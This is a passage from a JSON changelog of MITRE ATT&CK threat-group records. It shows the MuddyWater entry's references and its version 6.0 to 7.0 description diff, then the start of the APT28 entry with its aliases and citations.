                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
                        },
                        {
                            "source_name": "ClearSky MuddyWater June 2019",
                            "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.",
                            "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf"
                        },
                        {
                            "source_name": "CYBERCOM Iranian Intel Cyber January 2022",
                            "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.",
                            "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
                        },
                        {
                            "source_name": "ESET_MuddyWater_Dec2025",
                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
                        },
                        {
                            "source_name": "FalconFeeds_Iran_Mar2026",
                            "description": "FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.",
                            "url": "https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict"
                        },
                        {
                            "source_name": "DHS CISA AA22-055A MuddyWater February 2022",
                            "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.",
                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a"
                        },
                        {
                            "source_name": "Huntio_IranInfra_Mar2026",
                            "description": "Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.",
                            "url": "https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters"
                        },
                        {
                            "source_name": "Unit 42 MuddyWater Nov 2017",
                            "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
                        },
                        {
                            "source_name": "Talos MuddyWater Jan 2022",
                            "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.",
                            "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html"
                        },
                        {
                            "source_name": "Anomali Static Kitten February 2021",
                            "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.",
                            "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Proofpoint TA450 Phishing March 2024",
                            "description": "Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign"
                        },
                        {
                            "source_name": "NaumaanProofpoint_GlobalClickFix_April2025",
                            "description": "Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.",
                            "url": "https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix"
                        },
                        {
                            "source_name": "Trend Micro Muddy Water March 2021",
                            "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.",
                            "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
                        },
                        {
                            "source_name": "Reaqta MuddyWater November 2017",
                            "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.",
                            "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/"
                        },
                        {
                            "source_name": "FireEye MuddyWater Mar 2018",
                            "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
                            "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
                        },
                        {
                            "source_name": "Symantec MuddyWater Dec 2018",
                            "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
                            "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
                        },
                        {
                            "source_name": "SymantecCarbonBlack_Seedworm_Mar2026",
                            "description": "Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.",
                            "url": "https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Daniyal Naeem, BT Security",
                        "Marco Pedrinazzi, @pedrinazziM",
                        "Ozer Sarilar, @ozersarilar, STM",
                        "Dragos Threat Intelligence"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack",
                        "mobile-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "7.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-23 03:26:57.416000+00:00\", \"old_value\": \"2025-10-22 19:08:44.552000+00:00\"}, \"root['description']\": {\"new_value\": \"[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   \", \"old_value\": \"[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)\"}, \"root['x_mitre_version']\": {\"new_value\": \"7.0\", \"old_value\": \"6.0\"}}, \"iterable_item_added\": {\"root['aliases'][8]\": \"MuddyKrill\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][4]\": {\"source_name\": \"MuddyKrill\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}, \"root['external_references'][14]\": {\"source_name\": \"ESET_MuddyWater_Dec2025\", \"description\": \"ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.\", \"url\": \"https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\"}, \"root['external_references'][15]\": {\"source_name\": \"FalconFeeds_Iran_Mar2026\", \"description\": \"FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.\", \"url\": \"https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict\"}, \"root['external_references'][17]\": {\"source_name\": \"Huntio_IranInfra_Mar2026\", \"description\": \"Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.\", \"url\": \"https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters\"}, \"root['external_references'][23]\": {\"source_name\": \"NaumaanProofpoint_GlobalClickFix_April2025\", \"description\": \"Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.\", \"url\": \"https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix\"}, \"root['external_references'][28]\": {\"source_name\": \"SymantecCarbonBlack_Seedworm_Mar2026\", \"description\": \"Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.\", \"url\": \"https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\"}, \"root['x_mitre_contributors'][3]\": \"Dragos Threat Intelligence\"}}",
                    "previous_version": "6.0",
                    "version_change": "6.0 \u2192 7.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to65__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to65__0\"><a href=\"#difflib_chg_to65__top\">t</a></td><td class=\"diff_header\" id=\"from65_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">[MuddyWater](https://attack.mitre.org/groups/G0069)&nbsp;is&nbsp;a&nbsp;cyb</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to65__top\">t</a></td><td class=\"diff_header\" id=\"to65_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">[MuddyWater](https://attack.mitre.org/groups/G0069)&nbsp;is&nbsp;a&nbsp;cyb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">er&nbsp;espionage&nbsp;group&nbsp;assessed&nbsp;to&nbsp;be&nbsp;a&nbsp;subordinate&nbsp;element&nbsp;with</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;espionage&nbsp;group&nbsp;assessed&nbsp;to&nbsp;be&nbsp;a&nbsp;subordinate&nbsp;element&nbsp;with</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">in&nbsp;Iran's&nbsp;Ministry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Cita</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">in&nbsp;Iran's&nbsp;Ministry&nbsp;of&nbsp;Intelligence&nbsp;and&nbsp;Security&nbsp;(MOIS).(Cita</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion:&nbsp;CYBERCOM&nbsp;Iranian&nbsp;Intel&nbsp;Cyber&nbsp;January&nbsp;2022)&nbsp;Since&nbsp;at&nbsp;le</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tion:&nbsp;CYBERCOM&nbsp;Iranian&nbsp;Intel&nbsp;Cyber&nbsp;January&nbsp;2022)&nbsp;Since&nbsp;at&nbsp;le</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ast&nbsp;2017,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0069</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ast&nbsp;2017,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0069</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">)&nbsp;has&nbsp;targeted&nbsp;a&nbsp;range&nbsp;of&nbsp;government&nbsp;and&nbsp;private&nbsp;organizatio</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">)&nbsp;has&nbsp;targeted&nbsp;a&nbsp;range&nbsp;of&nbsp;government&nbsp;and&nbsp;private&nbsp;organizatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ns&nbsp;across&nbsp;sectors,&nbsp;including&nbsp;telecommunications,&nbsp;local&nbsp;gover</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns&nbsp;across&nbsp;sectors,&nbsp;including&nbsp;telecommunications,&nbsp;local&nbsp;gover</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">nment,&nbsp;defense,&nbsp;and&nbsp;oil&nbsp;and&nbsp;natural&nbsp;gas&nbsp;organizations,&nbsp;in&nbsp;th</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nment,&nbsp;finance,&nbsp;defense,&nbsp;and&nbsp;oil&nbsp;and&nbsp;natural&nbsp;gas&nbsp;organizatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">e&nbsp;Middle&nbsp;East,&nbsp;Asia,&nbsp;Africa,&nbsp;Europe,&nbsp;and&nbsp;North&nbsp;America.(Cita</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ns,&nbsp;in&nbsp;the&nbsp;Middle&nbsp;East&nbsp;(specifically&nbsp;the&nbsp;UAE&nbsp;and&nbsp;Saudi&nbsp;Arabi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">tion:&nbsp;Unit&nbsp;42&nbsp;MuddyWater&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Symantec&nbsp;MuddyW</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">a),&nbsp;Asia,&nbsp;Africa,&nbsp;Europe,&nbsp;and&nbsp;North&nbsp;America.&nbsp;[MuddyWater](ht</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ater&nbsp;Dec&nbsp;2018)(Citation:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;Nov&nbsp;2018)(Citat</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tps://attack.mitre.org/groups/G0069)&nbsp;has&nbsp;reused&nbsp;domains&nbsp;dati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ion:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;June&nbsp;2019)(Citation:&nbsp;Reaqta&nbsp;MuddyWa</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ng&nbsp;back&nbsp;to&nbsp;October&nbsp;2025,&nbsp;and&nbsp;has&nbsp;a&nbsp;preference&nbsp;for&nbsp;NameCheap&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;November&nbsp;2017)(Citation:&nbsp;DHS&nbsp;CISA&nbsp;AA22-055A&nbsp;MuddyWater&nbsp;F</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">and&nbsp;Hosterdaddy&nbsp;Private&nbsp;Limited&nbsp;(AS136557).&nbsp;In&nbsp;late&nbsp;2025&nbsp;and</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ebruary&nbsp;2022)(Citation:&nbsp;Talos&nbsp;MuddyWater&nbsp;Jan&nbsp;2022)</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;early&nbsp;2026,&nbsp;[MuddyWater](https://attack.mitre.org/groups/G0</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">069)&nbsp;used&nbsp;commercial&nbsp;satellite&nbsp;internet&nbsp;(i.e.,&nbsp;Starlink)&nbsp;for</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;command&nbsp;and&nbsp;control&nbsp;(C2)&nbsp;communication.&nbsp;(Citation:&nbsp;FalconFe</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eds_Iran_Mar2026)(Citation:&nbsp;Huntio_IranInfra_Mar2026)(Citati</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">on:&nbsp;Unit&nbsp;42&nbsp;MuddyWater&nbsp;Nov&nbsp;2017)(Citation:&nbsp;Symantec&nbsp;MuddyWat</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">er&nbsp;Dec&nbsp;2018)(Citation:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;Nov&nbsp;2018)(Citatio</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n:&nbsp;ClearSky&nbsp;MuddyWater&nbsp;June&nbsp;2019)(Citation:&nbsp;Reaqta&nbsp;MuddyWate</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">r&nbsp;November&nbsp;2017)(Citation:&nbsp;DHS&nbsp;CISA&nbsp;AA22-055A&nbsp;MuddyWater&nbsp;Feb</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ruary&nbsp;2022)(Citation:&nbsp;Talos&nbsp;MuddyWater&nbsp;Jan&nbsp;2022)(Citation:&nbsp;N</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">aumaanProofpoint_GlobalClickFix_April2025)(Citation:&nbsp;ESET_Mu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ddyWater_Dec2025)(Citation:&nbsp;SymantecCarbonBlack_Seedworm_Mar</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">2026)&nbsp;&nbsp;&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "minor_version_changes": [
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:48.664000+00:00",
                    "modified": "2026-04-21 13:20:49.866000+00:00",
                    "name": "APT28",
                    "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ",
                    "aliases": [
                        "APT28",
                        "IRON TWILIGHT",
                        "SNAKEMACKEREL",
                        "Swallowtail",
                        "Group 74",
                        "Sednit",
                        "Sofacy",
                        "Pawn Storm",
                        "Fancy Bear",
                        "STRONTIUM",
                        "Tsar Team",
                        "Threat Group-4127",
                        "TG-4127",
                        "Forest Blizzard",
                        "FROZENLAKE",
                        "GruesomeLarch"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0007",
                            "external_id": "G0007"
                        },
                        {
                            "source_name": "SNAKEMACKEREL",
                            "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)"
                        },
                        {
                            "source_name": "Fancy Bear",
                            "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "Tsar Team",
                            "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)"
                        },
                        {
                            "source_name": "APT28",
                            "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "STRONTIUM",
                            "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
                        },
                        {
                            "source_name": "FROZENLAKE",
                            "description": "(Citation: Leonard TAG 2023)"
                        },
                        {
                            "source_name": "Forest Blizzard",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "GruesomeLarch",
                            "description": "(Citation: Nearest Neighbor Volexity)"
                        },
                        {
                            "source_name": "IRON TWILIGHT",
                            "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)"
                        },
                        {
                            "source_name": "Threat Group-4127",
                            "description": "(Citation: SecureWorks TG-4127)"
                        },
                        {
                            "source_name": "TG-4127",
                            "description": "(Citation: SecureWorks TG-4127)"
                        },
                        {
                            "source_name": "Pawn Storm",
                            "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) "
                        },
                        {
                            "source_name": "Swallowtail",
                            "description": "(Citation: Symantec APT28 Oct 2018)"
                        },
                        {
                            "source_name": "Group 74",
                            "description": "(Citation: Talos Seduploader Oct 2017)"
                        },
                        {
                            "source_name": "Accenture SNAKEMACKEREL Nov 2018",
                            "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.",
                            "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50"
                        },
                        {
                            "source_name": "Crowdstrike DNC June 2016",
                            "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.",
                            "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
                        },
                        {
                            "source_name": "Leonard TAG 2023",
                            "description": "Billy Leonard. (2023, April 19). Ukraine remains Russia\u2019s biggest cyber focus in 2023. Retrieved March 1, 2024.",
                            "url": "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/"
                        },
                        {
                            "source_name": "US District Court Indictment GRU Oct 2018",
                            "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.",
                            "url": "https://www.justice.gov/opa/page/file/1098481/download"
                        },
                        {
                            "source_name": "GRIZZLY STEPPE JAR",
                            "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.",
                            "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf"
                        },
                        {
                            "source_name": "ESET Zebrocy May 2019",
                            "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.",
                            "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"
                        },
                        {
                            "source_name": "ESET Sednit Part 3",
                            "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.",
